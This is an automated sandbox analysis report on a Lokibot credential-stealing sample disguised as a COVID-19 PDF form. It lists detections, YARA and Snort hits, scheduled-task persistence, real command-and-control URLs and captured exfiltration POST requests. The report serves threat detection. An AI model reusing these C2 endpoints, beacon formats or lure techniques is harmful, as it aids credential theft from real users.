Loading ...

Play interactive tourEdit tour

Windows Analysis Report RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe

Overview

General Information

Sample Name:RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
Analysis ID:442954
MD5:ea646520496fd4603aaf0f5778231f0d
SHA1:5112f3f6ae6a8a7cfac8364433128228c450f203
SHA256:a130cf9df18f1ae304826c98d4e7cfd2e75043b126a1df0c0a36f98a64cde5c2
Tags:exelokibot
Infos:

Most interesting Screenshot:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
.NET source code contains method to dynamically call methods (often used by packers)
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Drops PE files
Enables debug privileges
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe (PID: 5708 cmdline: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' MD5: EA646520496FD4603AAF0F5778231F0D)
    • schtasks.exe (PID: 5504 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qvDFOnW' /XML 'C:\Users\user\AppData\Local\Temp\tmp4A8A.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
      00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
        • 0x6ffe7:$des3: 68 03 66 00 00
        • 0x743e4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
        • 0x744b0:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
        00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Click to see the 15 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackLoki_1Loki Payloadkevoreilly
                • 0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
                • 0x13ffc:$a2: last_compatible_version
                6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
                • 0x12fff:$des3: 68 03 66 00 00
                • 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
                • 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
                Click to see the 15 entries

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Suspicious Double ExtensionShow sources
                Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, CommandLine|base64offset|contains: HR, Image: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, NewProcessName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, OriginalFileName: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentCommandLine: 'C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe' , ParentImage: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ParentProcessId: 5708, ProcessCommandLine: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, ProcessId: 3704

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://63.141.228.141/32.php/fn1ToJTMzu3Td"]}
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://63.141.228.141/32.php/fn1ToJTMzu3TdVirustotal: Detection: 11%Perma Link
                Multi AV Scanner detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeVirustotal: Detection: 34%Perma Link
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeReversingLabs: Detection: 19%
                Multi AV Scanner detection for submitted fileShow sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeVirustotal: Detection: 34%Perma Link
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeReversingLabs: Detection: 19%
                Machine Learning detection for dropped fileShow sources
                Source: C:\Users\user\AppData\Roaming\qvDFOnW.exeJoe Sandbox ML: detected
                Machine Learning detection for sampleShow sources
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeJoe Sandbox ML: detected
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49715 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49717 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 63.141.228.141:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 63.141.228.141:80
                C2 URLs / IPs found in malware configurationShow sources
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://63.141.228.141/32.php/fn1ToJTMzu3Td
                Source: Joe Sandbox ViewIP Address: 63.141.228.141 63.141.228.141
                Source: Joe Sandbox ViewASN Name: NOCIXUS NOCIXUS
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: global trafficHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 163Connection: close
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: unknownTCP traffic detected without corresponding DNS query: 63.141.228.141
                Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exeCode function: 6_2_00404ED4 recv,
                Source: unknownHTTP traffic detected: POST /32.php/fn1ToJTMzu3Td HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 63.141.228.141Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: FAC4DD3CContent-Length: 190Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 01 Jul 2021 12:36:31 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 2
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.238593884.000000000302F000.00000004.00000001.sdmpString found in binary or memory: http://63.141.228.141/32.php/fn1ToJTMzu3Td?qM
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221764921.0000000000F67000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com8
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.combi
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comrsP
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000003.201702997.0000000000F6C000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.coms
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.227440080.00000000068B2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmpString found in binary or memory: https://apple.com
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.222186252.00000000027D1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
                Source: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe, 00000000.00000002.221579092.0000000000B9B000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                Source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                Source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
